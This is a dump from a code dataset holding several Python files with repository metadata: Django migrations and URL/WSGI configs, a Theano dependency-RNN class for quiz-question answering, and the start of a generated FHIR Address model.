migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('reviews', '0002_review_rating'),
]
operations = [
migrations.AddField(
model_name='review',
name='agreed',
field=models.ManyToManyField(related_name='agreed', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='review',
name='disagreed',
field=models.ManyToManyField(related_name='disagreed', to=settings.AUTH_USER_MODEL),
),
]
| [
"aslammunnazzah@gmail.com"
] | aslammunnazzah@gmail.com |
47bc571dda56b8ddb2b1676d90162a28af5f65d2 | 8401f24efc2f55c92322872a3c2e739311fb3b9b | /Homework3_2/Homework3/dependencyRNN.py | be41fcd426ca07533381a17db8522fbae25c1406 | [] | no_license | sloanchoi1124/nlp_stuff | dda16236e595c0cf6ce716e0e7284545505e8abf | 42c82f17a1bacb8b2b64c39ee149c6025719513d | refs/heads/master | 2021-01-19T18:51:02.939983 | 2017-04-16T01:55:49 | 2017-04-16T01:55:49 | 88,384,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,962 | py | import json
from math import sqrt
from collections import OrderedDict, defaultdict
import theano
import theano.tensor as T
import numpy as np
from adagrad import Adagrad
class DependencyRNN:
    '''
    class for dependency RNN for QANTA

    Builds a Theano computation graph over dependency-parse trees: each
    node's hidden state combines its word embedding with the relation-
    transformed states of its children, and training minimizes a max-margin
    ranking loss between the correct answer embedding and sampled wrong ones.
    '''
    def __init__(self, d, V, r, answer_idxs, embeddings=None, seed=0):
        '''
        d = dimensionality of embeddings
        V = size of vocabulary
        r = number of dependency relations
        answer_idxs = list of indices into the embeddings matrix for all the answers
        embeddings = pre-trained word embeddings
        seed = for random number generator for reproducivility
        '''
        self.d = d
        # Uniform init ranges (Glorot-style scaling with fixed fan constants).
        rnge = sqrt(6) / sqrt(201)
        rnge_we = sqrt(6) / sqrt(51)
        np.random.seed(seed)
        #|V| x d embedding matrix
        if embeddings is None:
            self.We = theano.shared(name='embeddings',
                                    value=np.random.rand(V, d) * 2 * rnge_we - rnge_we
                                    ).astype(theano.config.floatX)
        else:
            self.We = theano.shared(name='embeddings',
                                    value=embeddings
                                    ).astype(theano.config.floatX)
        #r x d x d tensor (matrix for each dependency relation)
        self.Wr = theano.shared(name='dependencies',
                                value=np.random.rand(r, d, d) * 2 * rnge - rnge
                                ).astype(theano.config.floatX)
        #d x d map from embedding to hidden vector
        self.Wv = theano.shared(name='Wv',
                                value=np.random.rand(d, d) * 2 * rnge - rnge
                                ).astype(theano.config.floatX)
        #d long bias vector
        self.b = theano.shared(name='b',
                               value=np.zeros(d, dtype=theano.config.floatX))
        #self.params = [self.We, self.Wr, self.Wv, self.b]
        # NOTE(review): self.We is deliberately excluded from self.params (see
        # the commented line above), so word embeddings are NOT updated by
        # gradient descent — confirm this is intended.
        self.params = [self.Wr, self.Wv, self.b]
        self.answer_idxs = np.array(answer_idxs, dtype=np.int32)
        # Uniform sampling distribution over answers; the correct answer's
        # slot is zeroed temporarily during train() so it is never sampled.
        self.ans_probabilities = np.ones(self.answer_idxs.shape[0])/(self.answer_idxs.shape[0]-1)
        self.ans_lookup = {j:i for i,j in enumerate(self.answer_idxs)}
        self._answers = {}
        self.descender = Adagrad(self.params)

        def normalized_tanh(x):
            '''returns tanh(x) / ||tanh(x)||'''
            tanh_x = T.tanh(x)
            #use dot dot product
            tanh_x_abs = T.sqrt((tanh_x ** 2).sum())
            return tanh_x / tanh_x_abs

        # Nonlinearity applied at every tree node.
        self.f = normalized_tanh

        #need to calculate both the input to its parent node and the error at this step
        def recurrence(n, hidden_states, hidden_sums, cost, x, r, p, wrong_ans, corr_ans):
            '''
            function called below by scan over the nodes in the dependency parse
            n - this is the index of the current node
            hidden_states - a list of hidden_states for every node, to be updated
            hidden_sums - sum over the children of dot product of the hidden nodes and the relation matrix
            cost - the total cost so far for this tree
            x - a list of word embeddings (x[n] will access the embedding for the current word)
            r - a list of relation matrices (r[n] will access the current matrix)
            p - a list of parent node indices
            wrong_ans - a list of randomly sampled word embeddings for wrong answers
            corr_ans - the word embedding for the correct answer
            You need to calculate 3 things:
            1) The value of hidden_states[n] : h_n = f(W_v \dot x_n + b + sum_n)
            2) The updated value of hidden_sums[p[n]] : hidden_sums[p[n]] + r(n) \dot h_n
            3) The updated cost :
            for a single node, this is \sum_{z \in wrong_ans} max(0, 1 - x_c \dot h_n + x_z \dot h_n)
            you need to return the updates to hidden_states, hidden_sums, and cost
            (in that order)
            '''
            #value of hidden_states[n]
            h_n= self.f(T.dot(self.Wv, x[n]) + self.b + hidden_sums[n])
            new_states = T.set_subtensor(hidden_states[n], h_n)
            #updated value of hidden_sums[p[n]]
            h_sums_p_n = hidden_sums[p[n]] + T.dot(r[n], h_n)
            new_sum = T.set_subtensor(hidden_sums[p[n]], h_sums_p_n)
            #updated cost: inner scan accumulates the hinge loss over all
            #sampled wrong answers for this node
            outputs_info = T.as_tensor_variable(np.asarray(0, theano.config.floatX))
            result, updates = theano.scan(fn = single_point_cost,
                                          sequences = wrong_ans,
                                          outputs_info = outputs_info,
                                          non_sequences = [h_n, corr_ans])
            #cost_update = theano.function(inputs=[wrong_ans, h_n, corr_ans], outputs = result, updates = updates)
            #cost_update_result = cost_update(wrong_ans, h_n, corr_ans)
            return [new_states, new_sum, result[-1]+cost]

        # One hinge-loss term: max(0, 1 - corr.h + wrong.h), added to the
        # running accumulator outputs_info.
        def single_point_cost(new_wrong_ans, outputs_info, h_n, corr_ans):
            return outputs_info + T.maximum(T.as_tensor_variable(np.asarray(0, theano.config.floatX)), T.as_tensor_variable(np.asarray(1, theano.config.floatX)) - T.dot(corr_ans, h_n) + T.dot(new_wrong_ans, h_n))

        # Symbolic inputs for one dependency tree.
        idxs = T.ivector('idxs')
        x = self.We[idxs]
        rel_idxs = T.ivector('rel_idxs')
        r = self.Wr[rel_idxs]
        p = T.ivector('parents')
        wrong_idxs = T.ivector('wrong_idxs')
        wrong_ans = self.We[wrong_idxs]
        corr_idx = T.iscalar('corr_idx') # index of answer
        corr_ans = self.We[corr_idx]
        hidden_states = T.zeros((idxs.shape[0], d), dtype=theano.config.floatX)
        #needs to be sent_length + 1 to store final sum
        hidden_sums = T.zeros((idxs.shape[0]+1, d), dtype=theano.config.floatX)
        [h, s, cost], updates = theano.scan(fn=recurrence,
                                            sequences=T.arange(x.shape[0]),
                                            outputs_info=[hidden_states,
                                                          hidden_sums,
                                                          T.as_tensor_variable(np.asarray(0, theano.config.floatX))],
                                            non_sequences=[x, r, p, wrong_ans, corr_ans])
        final_states = h[-1]
        # Compiled function: per-node hidden states for a tree.
        self.states = theano.function(inputs=[idxs, rel_idxs, p, wrong_idxs, corr_idx], outputs=final_states)
        final_cost = cost[-1] #no regularization
        gradients = T.grad(final_cost, self.params)
        # Compiled function: [cost, grad_Wr, grad_Wv, grad_b] for a tree.
        self.cost_and_grad = theano.function(inputs=[idxs, rel_idxs, p, wrong_idxs, corr_idx], outputs=[final_cost] + gradients)

    def gradient_descent(self, new_gradients):
        # Delegate the parameter update to the Adagrad descender.
        self.descender.gradient_descent(*new_gradients)

    #batch consists of tuples of word indices, relation indices, parent indices, and an answer index
    def train(self, batch, num_wrong_ans=100):
        # Accumulate cost and gradients over the whole batch, then take one
        # (node-count normalized) Adagrad step.  Returns the mean cost/node.
        total_cost_and_grad = None
        total_nodes = 0.
        #split data into batches, then into minibatches for multiprocessing
        for datum in batch:
            idxs, rel_idxs, p, corr_idx = datum
            #sample new wrong answers for every point (make sure not to sample the correct answer)
            self.ans_probabilities[self.ans_lookup[corr_idx]] = 0
            wrong_idxs = self.answer_idxs[np.random.choice(self.answer_idxs.shape[0],
                                                           num_wrong_ans,
                                                           False,
                                                           self.ans_probabilities)]
            # Restore the uniform probability for the correct answer's slot.
            self.ans_probabilities[self.ans_lookup[corr_idx]] = 1./(self.ans_probabilities.shape[0]-1)
            cost_and_grad = self.cost_and_grad(idxs, rel_idxs, p, wrong_idxs, corr_idx)
            if total_cost_and_grad is None:
                total_cost_and_grad = [0] + [np.zeros(i.shape) for i in cost_and_grad[1:]]
            for i in range(len(cost_and_grad)):
                total_cost_and_grad[i] += cost_and_grad[i]
            total_nodes += len(idxs)
        #update gradients from total_cost_and_grad[1:]
        self.gradient_descent([i/total_nodes for i in total_cost_and_grad[1:]])
        return total_cost_and_grad[0]/total_nodes

    def reset_weights(self):
        # Reset the Adagrad accumulator / weights via the descender.
        self.descender.reset_weights()

    def transform(self, batch, stop_indices=None):
        # Featurize each tree as the mean hidden state over its (optionally
        # stop-word-filtered) nodes.
        features = []
        for idxs,rel_idxs,p in batch:
            h = self.states(idxs, rel_idxs, p, [], 0)
            x = np.zeros(self.d)
            count = 0.0
            for i,s in enumerate(h):
                if stop_indices is None or idxs[i] not in stop_indices:
                    x += s
                    count += 1
            # NOTE(review): divides by zero if every token is a stop word.
            features.append(x / count)
        return(np.array(features))

    def save(self, filename, answers):
        '''save all the weights and hyperparameters to a file'''
        kwds = {}
        for param in self.params:
            kwds[param.name] = param.get_value()
        kwds['answer_idxs'] = self.answer_idxs
        with open(filename, 'wb') as f:
            np.savez(f, **kwds)
        # Also dump the answer-name -> embedding mapping as JSON.
        embeddings = self.We.get_value()
        for answer in answers:
            self._answers[answer] = embeddings[answers[answer]].tolist()
        with open(filename + '.json', 'w') as f:
            json.dump(self._answers, f)

    @classmethod
    def load(cls, filename):
        '''load pre-trained weights from a file'''
        with open(filename) as f:
            npzfile = np.load(f)
            # Recover the hyperparameters from the stored array shapes.
            d = npzfile['embeddings'].shape[1]
            V = npzfile['embeddings'].shape[0]
            r = npzfile['dependencies'].shape[0]
            d = cls(d, V, r, npzfile['answer_idxs'])
            for param in d.params:
                param.set_value(npzfile[param.name])
        with open(filename + '.json') as f:
            d._answers = json.load(f)
        return d

    @property
    def answers(self):
        # Mapping of answer name -> embedding, populated by save()/load().
        return self._answers
| [
"xc2315@barnard.edu"
] | xc2315@barnard.edu |
246b0476cf8c2531744051a05c4b6a1b6a94b575 | 71969e3559d93efbd560265db5264b1d93ddaaa2 | /LSpider/urls.py | 9206fa2394bfa78e8e9f921e98893e22ef2bdb57 | [
"MIT"
] | permissive | morole/LSpider | e3cc28c4afd060325d12a622c587cb45841a6e6d | 1dcdd820a8c0520cc8b3c851a5ba7bd06fcbf2f8 | refs/heads/master | 2023-06-20T21:58:43.979326 | 2021-08-02T02:36:45 | 2021-08-02T02:36:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 813 | py | """LSpider URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.urls import path, include
from django.contrib import admin
# Root URLconf: the admin site is currently disabled (commented out); every
# request is delegated to the `web.index` app.
urlpatterns = [
    # url(r'^admin/', admin.site.urls),
    path('', include('web.index.urls')),
]
| [
"lorexxar@gmail.com"
] | lorexxar@gmail.com |
26b88be88e55b48918a20c0c1005f2cb756ce5e6 | b23a50e14a7b13b58a04c34f54e9438fa1d0a877 | /code/JobAdmin/Job/migrations/0009_auto_20210415_1010.py | 59e1fd3fb500bd28a10cbcf8ff7146eeb6de6eda | [] | no_license | IamZY/StudentJobAdmin | 648bf3e9160b888b0b2349c8724ea43d1b69c53c | 60fc509a48d0fd49afb44ba3fbb796a33ed4aa5b | refs/heads/master | 2023-05-02T13:07:18.879989 | 2021-05-24T00:33:09 | 2021-05-24T00:33:09 | 367,892,392 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 523 | py | # Generated by Django 3.1.7 on 2021-04-15 02:10
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: adds two many-to-many fields (`agreed`,
    # `disagreed`) on the Review model, each pointing at the user model.

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('reviews', '0002_review_rating'),
    ]

    operations = [
        migrations.AddField(
            model_name='review',
            name='agreed',
            field=models.ManyToManyField(related_name='agreed', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='review',
            name='disagreed',
            field=models.ManyToManyField(related_name='disagreed', to=settings.AUTH_USER_MODEL),
        ),
    ]
| [
"562018301@qq.com"
] | 562018301@qq.com |
0d0979c507b6b380600c8f95dd37891c078b1b19 | 228604664db2a8c12ed08c7aee68e1e957d9ebaa | /Pętle.py | ad2e74c91d93ccd4ed5832cd86534b1407e0803b | [] | no_license | Dqvvidq/Nauka | 83767b08481f8e765a8d2a2bb46f30a7a903739e | a65da42b9ec422c30ebc6d1a422559d8de360fe3 | refs/heads/main | 2023-01-20T05:42:33.936406 | 2020-11-29T22:10:10 | 2020-11-29T22:10:10 | 310,408,412 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,329 | py | #petle for
name = "Ted"
for litera in name:
print(litera)
#pętla for w liscie
list = ["banan", "chleb", "Vuda", "mleko"]
for lista in list:
print(lista)
#petla for w krotce
kroteczka = ("Masło", True, False, 101)
for krotka in kroteczka:
print(krotka)
#petla for w slowniku (wyswietla tylko klucze)
słownik = {"Audi": "A6",
"Bmw": "e46",
"Alfa Romeo": "156"}
for klucze in słownik:
print(klucze)
#zwiększanie liter w liście
tv = ["Spadkobiercy", "Jaka to melodia", "Familiada"]
i = 0
for show in tv:
new = tv[i]
new = new.upper()
tv[i] = new
i += 1
print (tv)
# inna składnia pętli for
for i, show in enumerate(tv):
new = tv[i]
new = new.upper()
tv[i] = new
print(tv)
# przenoszenie elementów dzięki pętli for
coms = ["programowanie", "znajomi", "hillout"]
all_shows = []
for show in tv:
show = show.upper()
all_shows.append(show)
for show in coms:
show = show.upper()
all_shows.append(show)
print(all_shows)
# funkcja range
for i in range (1, 11):
print(i)
#petla while
x = 10
while x > 0:
print('{}'.format(x))
x -= 1
print("Szczęśliwego nowego roku!")
# instrukcja break
for i in range (0, 100):
print(i)
if i == 55:
break
#program który będzie prosić użytkownika o wpisanie danych dopoki nacisnie q
qs = ["Jak masz na imie?: ", "Jaki jest twój ulubiony kolor?: ", "Jakie masz zadanie?: "]
n = 0
while True:
print("Wpisz q aby zakończyć")
a = input(qs[n])
if a == "q":
print("Zakończono program")
break
n = (n + 1) % 3
#instrukcja continue
for i in range (2, 6):
if i == 3:
continue
print(i)
# instrukcja continue w petli while
i = 1
while i <= 5:
if i == 3:
i += 1
continue
print(i)
i += 1
# pętle zagnieżdżona
for i in range (1, 3):
print(i)
for letter in ["a", "b", "c"]:
print(letter)
list1 = [1, 2, 3, 4]
list2 = [5, 6, 7, 8]
added = []
for i in list1:
for j in list2:
added.append(i + j)
print(added)
# pętla for wewnatrz petli while
while input('t czy n?') !='n':
for i in range (1, 6):
print(i) | [
"noreply@github.com"
] | noreply@github.com |
3f9f273e1fb3fa3b5e303f9f4d2789e44b45ead3 | 307da11c0b04aca15815e204be43355bf598b8b1 | /FileHandlingAssig/assig3.py | e594a99e1ad2eba132dd7aab9980dc2103f7eba6 | [] | no_license | asatiratnesh/Python_Assignment | a573e47ce6ebca8e48a5b5efc80c9fdd17eb10bf | ece2930d0f23383b9227a2d7110101fec35036e9 | refs/heads/master | 2020-04-19T10:32:41.592101 | 2019-02-01T12:40:25 | 2019-02-01T12:40:25 | 168,143,492 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py | # convert the content of files in reverse order.
fileHandle = open("abc.txt", "r")
fileHandle.seek(0)
revString = fileHandle.read()[::-1]
fileHandleWrite = open("abc.txt", "w")
fileHandleWrite.write(revString)
fileHandleWrite.close()
| [
"ratnesh.asati@harbingergroup.com"
] | ratnesh.asati@harbingergroup.com |
28e9be7467b749a9f75b1304978786d2c3f3c9d7 | 756f1c2c014b928c57fc2001347abbb1f104b696 | /python/marvin/core/caching_query.py | 6c09ef2b321a6d4aef280f971b2724df5f7a9921 | [
"BSD-3-Clause"
] | permissive | sdss/marvin | ebe1e5325ed20fb46324ae6529bcc9acc220bd10 | db4c536a65fb2f16fee05a4f34996a7fd35f0527 | refs/heads/main | 2022-11-08T23:16:00.622114 | 2022-11-02T15:25:53 | 2022-11-02T15:25:53 | 71,501,855 | 56 | 40 | BSD-3-Clause | 2022-08-11T13:16:21 | 2016-10-20T20:30:15 | Python | UTF-8 | Python | false | false | 9,153 | py | #!/usr/bin/env python
# encoding: utf-8
"""caching_query.py
Represent functions and classes
which allow the usage of Dogpile caching with SQLAlchemy.
Introduces a query option called FromCache.
The three new concepts introduced here are:
* CachingQuery - a Query subclass that caches and
retrieves results in/from dogpile.cache.
* FromCache - a query option that establishes caching
parameters on a Query
* RelationshipCache - a variant of FromCache which is specific
to a query invoked during a lazy load.
* _params_from_query - extracts value parameters from
a Query.
The rest of what's here are standard SQLAlchemy and
dogpile.cache constructs.
"""
from sqlalchemy.orm.interfaces import MapperOption
from sqlalchemy.orm.query import Query
from dogpile.cache.api import NO_VALUE
class CachingQuery(Query):
    """A Query subclass which optionally loads full results from a dogpile
    cache region.

    The CachingQuery optionally stores additional state that allows it to
    consult a dogpile.cache cache before accessing the database, in the form
    of a FromCache or RelationshipCache object. Each of these objects
    refer to the name of a :class:`dogpile.cache.Region` that's been configured
    and stored in a lookup dictionary. When such an object has associated
    itself with the CachingQuery, the corresponding :class:`dogpile.cache.Region`
    is used to locate a cached result. If none is present, then the
    Query is invoked normally, the results being cached.

    The FromCache and RelationshipCache mapper options below represent
    the "public" method of configuring this state upon the CachingQuery.
    """

    def __init__(self, regions, *args, **kw):
        # `regions`: dict mapping region name -> dogpile.cache Region.
        self.cache_regions = regions
        Query.__init__(self, *args, **kw)

    def __iter__(self):
        """override __iter__ to pull results from dogpile
        if particular attributes have been configured.

        Note that this approach does *not* detach the loaded objects from
        the current session. If the cache backend is an in-process cache
        (like "memory") and lives beyond the scope of the current session's
        transaction, those objects may be expired. The method here can be
        modified to first expunge() each loaded item from the current
        session before returning the list of items, so that the items
        in the cache are not the same ones in the current Session.
        """
        # `_cache_region` is set by FromCache/RelationshipCache options.
        if hasattr(self, '_cache_region'):
            return self.get_value(createfunc=lambda: list(Query.__iter__(self)))
        else:
            return Query.__iter__(self)

    def _get_cache_plus_key(self):
        """Return a cache region plus key."""
        dogpile_region = self.cache_regions[self._cache_region.region]
        # An explicit cache_key on the option overrides the derived key.
        if self._cache_region.cache_key:
            key = self._cache_region.cache_key
        else:
            key = _key_from_query(self)
        return dogpile_region, key

    def invalidate(self):
        """Invalidate the cache value represented by this Query."""
        dogpile_region, cache_key = self._get_cache_plus_key()
        dogpile_region.delete(cache_key)

    def get_value(self, merge=True, createfunc=None,
                  expiration_time=None, ignore_expiration=False):
        """Return the value from the cache for this query.

        Raise KeyError if no value present and no
        createfunc specified.
        """
        dogpile_region, cache_key = self._get_cache_plus_key()

        # ignore_expiration means, if the value is in the cache
        # but is expired, return it anyway. This doesn't make sense
        # with createfunc, which says, if the value is expired, generate
        # a new value.
        assert not ignore_expiration or not createfunc, \
            "Can't ignore expiration and also provide createfunc"

        if ignore_expiration or not createfunc:
            cached_value = dogpile_region.get(cache_key,
                                              expiration_time=expiration_time,
                                              ignore_expiration=ignore_expiration)
        else:
            cached_value = dogpile_region.get_or_create(
                cache_key,
                createfunc,
                expiration_time=expiration_time
            )
        if cached_value is NO_VALUE:
            raise KeyError(cache_key)
        if merge:
            # Re-associate cached instances with the current Session.
            cached_value = self.merge_result(cached_value, load=False)
        return cached_value

    def set_value(self, value):
        """Set the value in the cache for this query."""
        dogpile_region, cache_key = self._get_cache_plus_key()
        dogpile_region.set(cache_key, value)

    def use_cache(self, backend='default'):
        ''' Adds the cache onto a Query instance

        Parameters:
            backend (str):
                Type of cache backend to use. Can be 'null', 'default', or 'maps'.

        Returns:
            returns a SQLA query instance with caching turned on
        '''
        # Imported lazily to avoid a circular import at module load time.
        from marvin import marvindb
        from marvin.db.caching import regions
        assert backend in list(regions.keys()), 'backend must be a proper cache backend'
        return self.options(FromCache(backend)).options(*marvindb.cache_bits)
def query_callable(regions, query_cls=CachingQuery):
    """Return a Session `query_cls` factory that binds *regions* into every
    new *query_cls* instance."""
    def make_query(*args, **kwargs):
        return query_cls(regions, *args, **kwargs)
    return make_query
def _key_from_query(query, qualifier=None):
"""Given a Query, create a cache key.
There are many approaches to this; here we use the simplest,
which is to create an md5 hash of the text of the SQL statement,
combined with stringified versions of all the bound parameters
within it. There's a bit of a performance hit with
compiling out "query.statement" here; other approaches include
setting up an explicit cache key with a particular Query,
then combining that with the bound parameter values.
"""
stmt = query.with_labels().statement
compiled = stmt.compile()
params = compiled.params
# here we return the key as a long string. our "key mangler"
# set up with the region will boil it down to an md5.
return " ".join(
[str(compiled)] +
[str(params[k]) for k in sorted(params)])
class FromCache(MapperOption):
    """Specifies that a Query should load results from a cache."""

    # This option applies to the top-level query only, not to lazy loads.
    propagate_to_loaders = False

    def __init__(self, region="default", cache_key=None):
        """Construct a new FromCache.

        :param region: the cache region. Should be a
         region configured in the dictionary of dogpile
         regions.

        :param cache_key: optional. A string cache key
         that will serve as the key to the query. Use this
         if your query has a huge amount of parameters (such
         as when using in_()) which correspond more simply to
         some other identifier.
        """
        self.region = region
        self.cache_key = cache_key

    def process_query(self, query):
        """Process a Query during normal loading operation."""
        # CachingQuery.__iter__ checks for this attribute.
        query._cache_region = self
class RelationshipCache(MapperOption):
    """Specifies that a Query as called within a "lazy load"
    should load results from a cache."""

    # Unlike FromCache, this option must travel into lazy-load queries.
    propagate_to_loaders = True

    def __init__(self, attribute, region="default", cache_key=None):
        """Construct a new RelationshipCache.

        :param attribute: A Class.attribute which
         indicates a particular class relationship() whose
         lazy loader should be pulled from the cache.

        :param region: name of the cache region.

        :param cache_key: optional. A string cache key
         that will serve as the key to the query, bypassing
         the usual means of forming a key from the Query itself.
        """
        self.region = region
        self.cache_key = cache_key
        # Map (owning class, relationship key) -> this option.
        self._relationship_options = {
            (attribute.property.parent.class_, attribute.property.key): self
        }

    def process_query_conditionally(self, query):
        """Process a Query that is used within a lazy loader.

        (the process_query_conditionally() method is a SQLAlchemy
        hook invoked only within lazyload.)
        """
        if query._current_path:
            mapper, prop = query._current_path[-2:]
            key = prop.key

            # Walk the MRO so that an option registered on a base class
            # also matches queries issued for its subclasses.
            for cls in mapper.class_.__mro__:
                if (cls, key) in self._relationship_options:
                    relationship_option = self._relationship_options[(cls, key)]
                    query._cache_region = relationship_option
                    break

    def and_(self, option):
        """Chain another RelationshipCache option to this one.

        While many RelationshipCache objects can be specified on a single
        Query separately, chaining them together allows for a more efficient
        lookup during load.
        """
        self._relationship_options.update(option._relationship_options)
        return self
| [
"havok2063@hotmail.com"
] | havok2063@hotmail.com |
b216a687cf570621fe06b237e2f4af8888a5bd8f | 4acd0d1561e057ac312b6f62a5504fef8a9b8d1a | /attacks/fast_gradient.py | 334df07c4deb1a8f30dfa25f6ed35066dd55c5d3 | [] | no_license | ValamogulisZ/DS_FoolingCNN | 810bd8435752dbba2060901097aaf50d48e4eb08 | b576f3efeea7bc0a841d833472a81e009fac84dd | refs/heads/master | 2022-12-03T03:44:17.889915 | 2020-08-25T01:39:35 | 2020-08-25T01:39:35 | 290,056,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,115 | py | import tensorflow as tf
__all__ = [
'fgm', # fast gradient method
'fgmt' # fast gradient method with target
]
def fgm(model, x, eps=0.01, epochs=1, sign=True, clip_min=0., clip_max=1.):
    """
    Fast gradient method.
    See https://arxiv.org/abs/1412.6572 and https://arxiv.org/abs/1607.02533
    for details. This implements the revised version since the original FGM
    has label leaking problem (https://arxiv.org/abs/1611.01236).
    :param model: A wrapper that returns the output as well as logits.
    :param x: The input placeholder.
    :param eps: The scale factor for noise.
    :param epochs: The maximum epoch to run.
    :param sign: Use gradient sign if True, otherwise use gradient value.
    :param clip_min: The minimum value in output.
    :param clip_max: The maximum value in output.
    :return: A tensor, contains adversarial samples for each input.
    """
    xadv = tf.identity(x)
    ybar = model(xadv)
    yshape = ybar.get_shape().as_list()
    ydim = yshape[1]
    # Use the model's own prediction (argmax) as the label instead of the
    # true label -- this is the "revised" FGM that avoids label leaking.
    indices = tf.argmax(ybar, axis=1)
    # ydim == 1 means a single sigmoid output: threshold at 0.5;
    # otherwise build a one-hot target from the predicted class.
    target = tf.cond(
        tf.equal(ydim, 1),
        lambda: tf.nn.relu(tf.sign(ybar - 0.5)),
        lambda: tf.one_hot(indices, ydim, on_value=1.0, off_value=0.0))
    if 1 == ydim:
        loss_fn = tf.nn.sigmoid_cross_entropy_with_logits
    else:
        loss_fn = tf.nn.softmax_cross_entropy_with_logits
    if sign:
        noise_fn = tf.sign
    else:
        noise_fn = tf.identity
    # Positive step size: we ascend the loss w.r.t. the predicted label.
    eps = tf.abs(eps)
    def _cond(xadv, i):
        return tf.less(i, epochs)
    def _body(xadv, i):
        ybar, logits = model(xadv, logits=True)
        loss = loss_fn(labels=target, logits=logits)
        dy_dx, = tf.gradients(loss, xadv)
        # stop_gradient keeps the perturbation step out of any outer graph
        # differentiation; clip keeps the sample in the valid input range.
        xadv = tf.stop_gradient(xadv + eps*noise_fn(dy_dx))
        xadv = tf.clip_by_value(xadv, clip_min, clip_max)
        return xadv, i+1
    xadv, _ = tf.while_loop(_cond, _body, (xadv, 0), back_prop=False,
                            name='fast_gradient')
    return xadv
def fgmt(model, x, y=None, eps=0.01, epochs=1, sign=True, clip_min=0.,
         clip_max=1.):
    """
    Fast gradient method with target.

    See https://arxiv.org/pdf/1607.02533.pdf. This method is different from
    FGM that instead of decreasing the probability for the correct label, it
    increases the probability for the desired label.

    :param model: A model that returns the output as well as logits.
    :param x: The input placeholder.
    :param y: The desired target label, set to the least-likely class if
        None.  May be a scalar (broadcast to every sample) or a vector of
        per-sample class indices (assumed int32 -- TODO confirm callers).
    :param eps: The noise scale factor.
    :param epochs: Maximum epoch to run.
    :param sign: Use gradient sign if True, otherwise gradient values.
    :param clip_min: Minimum value in output.
    :param clip_max: Maximum value in output.
    :return: A tensor containing the adversarial sample for each input.
    """
    xadv = tf.identity(x)  # work on a copy so x itself is untouched
    ybar = model(xadv)
    ydim = ybar.get_shape().as_list()[1]
    n = tf.shape(ybar)[0]

    if y is None:
        # No explicit target: attack towards the least-likely class.
        indices = tf.argmin(ybar, axis=1)
    else:
        # BUG FIX: the vector branch previously returned tf.zeros([n]),
        # i.e. it always targeted class 0 and silently ignored the
        # caller's labels.  A scalar y is broadcast across the batch;
        # a vector y is used as-is.
        indices = tf.cond(tf.equal(0, tf.rank(y)),
                          lambda: tf.zeros([n], dtype=tf.int32) + y,
                          lambda: y)

    # Single sigmoid output: target is the flipped probability;
    # otherwise a one-hot encoding of the target class indices.
    target = tf.cond(
        tf.equal(ydim, 1),
        lambda: 1 - ybar,
        lambda: tf.one_hot(indices, ydim, on_value=1.0, off_value=0.0))

    if 1 == ydim:
        loss_fn = tf.nn.sigmoid_cross_entropy_with_logits
    else:
        loss_fn = tf.nn.softmax_cross_entropy_with_logits

    if sign:
        noise_fn = tf.sign
    else:
        noise_fn = tf.identity

    # Negative step size: we *descend* the loss w.r.t. the target label,
    # which increases the probability of that label.
    eps = -tf.abs(eps)

    def _cond(xadv, i):
        return tf.less(i, epochs)

    def _body(xadv, i):
        ybar, logits = model(xadv, logits=True)
        loss = loss_fn(labels=target, logits=logits)
        dy_dx, = tf.gradients(loss, xadv)
        xadv = tf.stop_gradient(xadv + eps*noise_fn(dy_dx))
        xadv = tf.clip_by_value(xadv, clip_min, clip_max)
        return xadv, i+1

    xadv, _ = tf.while_loop(_cond, _body, (xadv, 0), back_prop=False,
                            name='fast_gradient_target')
    return xadv
| [
"wenda@uab.edu"
] | wenda@uab.edu |
33ada4e6e7d04902f90c47195ed200e4fd0537b1 | 7700871499bc3796f188a16948481b7d467094d0 | /src/wsgi.py | 4d1f6be01fca31755c2436d8ac9681d109f7581e | [] | no_license | jasonjets/mpulse | 68995dbcb52984675d31a117b2b6726475b40457 | 1eba3a83ee073da8b3d4a2df61402fc591c73975 | refs/heads/main | 2023-02-16T04:47:48.340054 | 2021-01-03T19:31:39 | 2021-01-03T19:31:39 | 307,150,250 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 327 | py | import os
from django.core.wsgi import get_wsgi_application

# WSGI entry point for the 'src' project.  The module body was previously
# duplicated verbatim (two imports, two setdefault calls, two application
# bindings); one copy is sufficient and behaviorally identical.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "src.settings")

application = get_wsgi_application()
"bettsjason@outlook.com"
] | bettsjason@outlook.com |
2de2010bec76a55f68fd7df8729f7d83ce87a3ea | fe8360d9284d8156cd557d3a757645c11849cdd9 | /models/address.py | 3c11b1443ea2136894676b06698d4e57f8b4cd02 | [] | no_license | hvanreenen/fhir-rest-server | 5a1a5bcb9a3477d9f9d133c263f61ba202db5741 | 36ae55706aba0fdfcf084dbb24bd8c73929b3e0f | refs/heads/master | 2021-01-10T23:45:06.793874 | 2016-10-20T09:57:04 | 2016-10-20T09:57:04 | 70,390,390 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,973 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 1.0.2.7202 (http://hl7.org/fhir/StructureDefinition/Address) on 2016-10-07.
# 2016, SMART Health IT.
from . import element
class Address(element.Element):
    """ A postal address.
    There is a variety of postal address formats defined around the world. This
    format defines a superset that is the basis for all addresses around the
    world.
    NOTE: generated from FHIR 1.0.2.7202 (see file header) -- prefer fixing
    the generator over hand-editing this class.
    """
